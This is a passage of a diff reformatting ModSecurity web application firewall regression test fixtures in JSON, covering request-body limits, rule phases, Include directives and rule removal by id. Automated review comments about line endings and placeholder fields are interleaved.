"SecRuleEngine On", "SecRequestBodyAccess On", "SecRequestBodyNoFilesLimit 20", 
@@ -628,46 +661,47 @@ ] }, { - "enabled":1, - "version_min":300000, - "resource":"libxml2", - "title":"SecRequestBodyNoFilesLimit - xml, limit not exceeded", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "77", + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyNoFilesLimit - xml, limit not exceeded", + "resource": "libxml2", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "77", "Content-Type": "application/xml" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "ccceee" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRequestBodyNoFilesLimit 90", 
@@ -676,54 +710,55 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRequestBodyNoFilesLimit - multipart, limit exceeded", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "77", + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyNoFilesLimit - multipart, limit exceeded", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "198", "Content-Type": "multipart/form-data; boundary=0000" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ - "--0000", - "Content-Disposition: form-data; name=\"a\"", - "", - "1", - "--0000", - "Content-Disposition: form-data; name=\"b\"; filename=\"c.txt\"", - "", - "2222222222222222222222222222222222222222222222222222222222222222222222", - "--0000--" + "--0000\n", + "Content-Disposition: form-data; name=\"a\"\n", + "\n", + "1\n", + "--0000\n", + "Content-Disposition: form-data; name=\"b\"; filename=\"c.txt\"\n", + "\n", + "2222222222222222222222222222222222222222222222222222222222222222222222\n", + "--0000--\n" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "debug_log":"Request body excluding files is bigger than the maximum expected.", - "http_code":400 + "expected": { + "debug_log": "Request body excluding files is bigger than the maximum expected.", + "http_code": 400 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRequestBodyNoFilesLimit 80", 
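Review bot: The multipart body in this hunk now ends every line with a bare `\n`, and the new `"Content-Length": "198"` matches that LF-only encoding, whereas multipart/form-data is delimited with CRLF on the wire. The `limit not exceeded` case in the next hunk has the same body. These two cases therefore exercise `SecRequestBodyNoFilesLimit` only on the lenient LF path. Line-ending handling is a place where a WAF's multipart parser can disagree with the backend's, so a CRLF twin would be worth adding, with lines such as `"--0000\r\n"` and the length recomputed (207 by my count, to be confirmed). The diff does not show how the harness joins the `body` array, so it is worth confirming that no extra separator is added on top of the embedded `\n`.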
@@ -731,53 +766,54 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRequestBodyNoFilesLimit - multipart, limit not exceeded", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "77", + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyNoFilesLimit - multipart, limit not exceeded", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "198", "Content-Type": "multipart/form-data; boundary=0000" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ - "--0000", - "Content-Disposition: form-data; name=\"a\"", - "", - "1", - "--0000", - "Content-Disposition: form-data; name=\"b\"; filename=\"c.txt\"", - "", - "2222222222222222222222222222222222222222222222222222222222222222222222", - "--0000--" + "--0000\n", + "Content-Disposition: form-data; name=\"a\"\n", + "\n", + "1\n", + "--0000\n", + "Content-Disposition: form-data; name=\"b\"; filename=\"c.txt\"\n", + "\n", + "2222222222222222222222222222222222222222222222222222222222222222222222\n", + "--0000--\n" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRequestBodyNoFilesLimit 120", @@ -785,4 +821,3 @@ ] } ] - 
diff --git a/test/test-cases/regression/config-calling_phases_by_name.json b/test/test-cases/regression/config-calling_phases_by_name.json
index 39bd6f46d2..14b050477b 100644
--- a/test/test-cases/regression/config-calling_phases_by_name.json
+++ b/test/test-cases/regression/config-calling_phases_by_name.json
@@ -1,79 +1,91 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing Config :: Phases by name (1/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Config :: Phases by name (1/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "debug_log":"Target value: \"other_value\" \\(Variable: MATCHED_VAR\\)" + "expected": { + "debug_log": "Target value: \"other_value\" \\(Variable: MATCHED_VAR\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS:key \"@contains other_value\" \"id:1,phase:request,pass,chain\"", "SecRule MATCHED_VAR \"@contains asdf\" \"\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Config :: Phases by name (2/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Config :: Phases by name (2/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Target value: \"other_value\" \\(Variable: MATCHED_VAR\\)" + "expected": { + "debug_log": "Target value: \"other_value\" \\(Variable: MATCHED_VAR\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS:key \"@contains other_value\" \"chain,pass,phase:response,id:28\"", "SecRule MATCHED_VAR \"@contains Aasdf\" \"\"", @@ -83,4 +95,3 @@ ] } ] - 
diff --git a/test/test-cases/regression/config-include-bad.json b/test/test-cases/regression/config-include-bad.json
index 76797552d7..6d64a14cd1 100644
--- a/test/test-cases/regression/config-include-bad.json
+++ b/test/test-cases/regression/config-include-bad.json
@@ -1,51 +1,159 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Include - bad rule", - "expected":{ + "enabled": 1, + "version_min": 300000, + "title": "Include - bad rule", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, "parser_error": "Rules error. File: test-cases/data/config_example3.txt. Line: 2. Column: 66. Expecting an action, got: ops \"id:1000,pass,t:trim\"" }, - "rules":[ + "rules": [ "SecRuleEngine On", "Include test-cases/data/config_example3.txt", "SecRule ARGS \"@missing_operator test\" \"id:19,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Include - missing file", - "expected":{ + "enabled": 1, + "version_min": 300000, + "title": "Include - missing file", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, "parser_error": "Rules error. File: config-include-bad.json. Line: 2. Column: 46. test-cases/data/config_example-ops.txt: Not able to open file." 
}, - "rules":[ + "rules": [ "SecRuleEngine On", "Include test-cases/data/config_example-ops.txt", "SecRule ARGS \"@contains test\" \"id:19,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Include - missing at include", - "expected":{ + "enabled": 1, + "version_min": 300000, + "title": "Include - missing at include", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, "parser_error": "Rules error. File: test-cases/data/config_example-ops-include.txt. Line: 1. Column: 52. test-cases/data/config_example-not-exist.txt: Not able to open file." }, - "rules":[ + "rules": [ "SecRuleEngine On", "Include test-cases/data/config_example-ops-include.txt", "SecRule ARGS \"@contains test\" \"id:19,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Include - duplicate id", - "expected":{ + "enabled": 1, + "version_min": 300000, + "title": "Include - duplicate id", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, "parser_error": "Rule id: 40 is duplicated" }, - "rules":[ + "rules": [ "SecRuleEngine On", "Include test-cases/data/config_example.txt", "Include test-cases/data/config_example.txt", diff --git a/test/test-cases/regression/config-include.json b/test/test-cases/regression/config-include.json index ab73de0760..1dd1c2b90a 100644 --- a/test/test-cases/regression/config-include.json +++ b/test/test-cases/regression/config-include.json 
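Review bot: `"http_code": 200` is added to `expected` in every case of this file, although each case expects a `parser_error`. The rules presumably never load and no transaction runs, so the status reads as an asserted outcome that is never actually checked. The new `client`/`server`/`request`/`response` blocks with empty `ip`, `uri` and `method` look like defaults serialized by the new `format` option rather than meaningful inputs. If so, the formatter could omit unset sections and `http_code` when `parser_error` is present. Otherwise the test-case documentation should say these fields are ignored for parser-error cases, so a later reader does not treat 200 as verified behaviour.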
@@ -1,199 +1,229 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Include (1/8)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Include (1/8)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Executing operator \"Contains\" with param \"config_example2\" against ARGS." 
+ "expected": { + "debug_log": "Executing operator \"Contains\" with param \"config_example2\" against ARGS.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "Include test-cases/data/config_example2.txt", "SecRule ARGS \"@contains test\" \"id:9,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Include (2/8)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Include (2/8)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Executing operator \"Contains\" with param \"config_example\" against ARGS." 
+ "expected": { + "debug_log": "Executing operator \"Contains\" with param \"config_example\" against ARGS.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "Include test-cases/data/config_example.txt", "SecRule ARGS \"@contains test\" \"id:9,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Include (3/8)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Include (3/8)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Executing operator \"Contains\" with param \"config_example2\" against ARGS." 
+ "expected": { + "debug_log": "Executing operator \"Contains\" with param \"config_example2\" against ARGS.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "Include test-cases/data/config_example2.txt", "SecRule ARGS \"@contains test\" \"id:9,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Include (4/8)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Include (4/8)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Executing operator \"Contains\" with param \"test\" against ARGS." 
+ "expected": { + "debug_log": "Executing operator \"Contains\" with param \"test\" against ARGS.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@contains test\" \"id:9,pass,t:trim\"", "Include test-cases/data/config_example2.txt" ] }, { - "enabled":1, - "version_min":300000, - "title":"Include (5/8)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Include (5/8)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Executing operator \"Contains\" with param \"config_example2\" against ARGS." + "expected": { + "debug_log": "Executing operator \"Contains\" with param \"config_example2\" against ARGS.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@contains test\" \"id:1,pass,t:trim\"", "Include test-cases/data/config_example.txt", 
@@ -201,120 +231,138 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Include (6/8)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Include (6/8)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Executing operator \"Contains\" with param \"test\" against ARGS." 
+ "expected": { + "debug_log": "Executing operator \"Contains\" with param \"test\" against ARGS.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "Include test-cases/data/config_example2.txt", "SecRule ARGS \"@contains test\" \"id:9,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Include (7/8)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Include (7/8)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "parser_error":"Looking at: 'test-cases/data/conasdffig_example2.txt'" + "expected": { + "http_code": 200, + "parser_error": "Looking at: 'test-cases/data/conasdffig_example2.txt'" }, - "rules":[ + "rules": [ "SecRuleEngine On", "Include test-cases/data/conasdffig_example2.txt", "SecRule ARGS \"@contains test\" \"id:9,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Include (8/8) -- quoted with wildcard", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Include (8/8) -- quoted with wildcard", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Executing operator \"Contains\" with param \"config_example2\" against ARGS." + "expected": { + "debug_log": "Executing operator \"Contains\" with param \"config_example2\" against ARGS.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "Include \"test-cases/data/config_ex*ple2.txt\"", "SecRule ARGS \"@contains test\" \"id:9,pass,t:trim\"" 
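Review bot: The `Include (7/8)` case now asserts `"http_code": 200` next to `parser_error`, although its rule set is expected to fail while loading (the include path `conasdffig_example2.txt` is presumably meant not to exist), so no response code would be produced if the harness stops at the parse error. Whether the runner reads `http_code` for parse-failure cases is not visible in this hunk; if it does not, I would drop the key so the fixture states only what is checked, leaving `"expected": { "parser_error": "Looking at: 'test-cases/data/conasdffig_example2.txt'" }`. The same pairing appears in the `SecDefaultAction: t:none` hunk of config-secdefaultaction.json, which also gains empty placeholders such as `"ip": ""` and `"method": ""`.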
diff --git a/test/test-cases/regression/config-remove_by_id.json b/test/test-cases/regression/config-remove_by_id.json index 9f074420b8..4dd07b85ec 100644 --- a/test/test-cases/regression/config-remove_by_id.json +++ b/test/test-cases/regression/config-remove_by_id.json @@ -1,39 +1,45 @@ [ { - "enabled":1, - "version_min":300000, - "title":"SecRuleRemoveById (1/3)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleRemoveById (1/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Skipped rule id '2'. Removed by an SecRuleRemove directive." + "expected": { + "debug_log": "Skipped rule id '2'. Removed by an SecRuleRemove directive.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleRemoveById 2", "SecRule ARGS \"@contains test\" \"id:1,pass,t:trim\"", "SecRule ARGS \"@contains test\" \"id:2,pass,t:trim\"", 
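Review bot: Adding `"Content-Length": "0"` and `"body": [ "" ]` to this bodiless GET changes the request the engine is tested against, not just the file's formatting: the header collection gains a fourth entry, and none of the fixtures visible here still sends a GET without a Content-Length. These rules only look at ARGS, so the expected debug_log should be unaffected, but for a WAF regression suite I would keep bodiless requests free of the header and, if these files come from the `format` mode added in modsecurity_test.cc, have it emit `"Content-Length"` only when `body` is non-empty. The same addition is repeated in the other two hunks of this file and in the config-remove_by_msg, config-remove_by_tag and config-response_type hunks below.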
@@ -41,40 +47,46 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleRemoveById (2/3)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleRemoveById (2/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Skipped rule id '2'. Removed by an SecRuleRemove directive." + "expected": { + "debug_log": "Skipped rule id '2'. Removed by an SecRuleRemove directive.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleRemoveById 1-3", "SecRule ARGS \"@contains test\" \"id:1,pass,t:trim\"", "SecRule ARGS \"@contains test\" 